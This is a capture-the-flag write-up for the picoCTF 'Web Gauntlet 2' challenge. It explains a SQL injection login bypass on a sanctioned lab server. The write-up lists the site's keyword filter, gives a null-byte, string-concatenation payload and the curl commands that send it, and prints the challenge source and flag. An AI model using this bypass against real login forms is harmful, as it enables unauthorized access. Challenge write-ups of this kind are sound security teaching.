Web Gauntlet 2

Problem

This website looks familiar... Log in as admin Site: http://mercury.picoctf.net:35178/ Filter: http://mercury.picoctf.net:35178/filter.php

Solution

  1. 1.
    According to filter.php the application filters the following: or and true false union like = > < ; -- /* */ admin.
  2. 2.
    The query that solves this is ad'||'min'%00, which is similar to the final payload in the "Web Gauntlet" challenge from the PicoCTF 2020 Mini competition. In sqlite the || operator concatenates strings, thus allowing us to bypass the filter for admin. Next, the %00 is a null byte, which terminates the SQL query.
  3. 3.
    A null byte cannot be typed directly into the website. So we use cURL instead: curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:35178/index.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" --output -. I copied the PHPSESSID cookie from the browser, which is important because it is how the website knows to give us the flag when we go to /filter.php to get the flag.
  4. 4.
    We can retreive the flag with the browser that has the same PHPSESSID or wth curl: curl http://mercury.picoctf.net:35178/filter.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" | grep picoCTF
  5. 5.
    The code for the filter and the flag are shown in /filter.php when the login is bypassed:
    <?php
    session_start();
    if (!isset($_SESSION["winner2"])) {
    $_SESSION["winner2"] = 0;
    }
    $win = $_SESSION["winner2"];
    $view = ($_SERVER["PHP_SELF"] == "/filter.php");
    if ($win === 0) {
    $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
    if ($view) {
    echo "Filters: ".implode(" ", $filter)."<br/>";
    }
    } else if ($win === 1) {
    if ($view) {
    highlight_file("filter.php");
    }
    $_SESSION["winner2"] = 0; // <- Don't refresh!
    } else {
    $_SESSION["winner2"] = 0;
    }
    // picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}
    ?>

Flag

picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}